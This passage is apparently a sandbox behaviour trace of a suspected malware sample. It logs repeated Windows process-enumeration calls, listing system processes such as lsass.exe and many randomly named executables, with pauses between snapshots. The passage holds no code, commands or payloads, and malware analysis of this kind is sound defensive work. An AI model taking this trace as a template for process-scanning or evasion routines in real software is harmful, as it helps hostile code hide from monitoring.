lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0071.640] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0071.640] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.641] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.641] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.642] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.642] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.642] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0071.643] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.643] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.644] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0071.644] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0071.645] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0071.645] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0071.646] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.646] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0071.647] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0071.647] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0071.647] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0071.648] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0071.648] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0071.649] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0071.649] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0071.650] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0071.650] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0071.651] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0071.651] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0071.651] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0071.652] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0071.652] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0071.653] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0071.653] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0071.654] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0071.654] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0071.654] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0071.655] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0071.655] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0071.656] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0071.656] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0071.657] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.657] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0071.658] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.658] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0071.659] CloseHandle (hObject=0xaac) returned 1 [0071.659] Sleep (dwMilliseconds=0x64) [0071.755] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xaac [0071.758] Process32First (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0071.758] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0071.759] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0071.759] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0071.760] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0071.760] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0071.761] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0071.761] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0071.761] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0071.762] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0071.762] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.763] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.763] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.764] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.764] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.764] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0071.765] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.765] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.766] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0071.766] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0071.767] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0071.767] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0071.767] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.768] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0071.768] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0071.769] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0071.769] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0071.770] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0071.770] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0071.771] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0071.771] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0071.771] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0071.772] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0071.772] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0071.773] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0071.773] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0071.774] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0071.774] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0071.774] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0071.775] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0071.775] Process32Next (in: hSnapshot=0xaac, 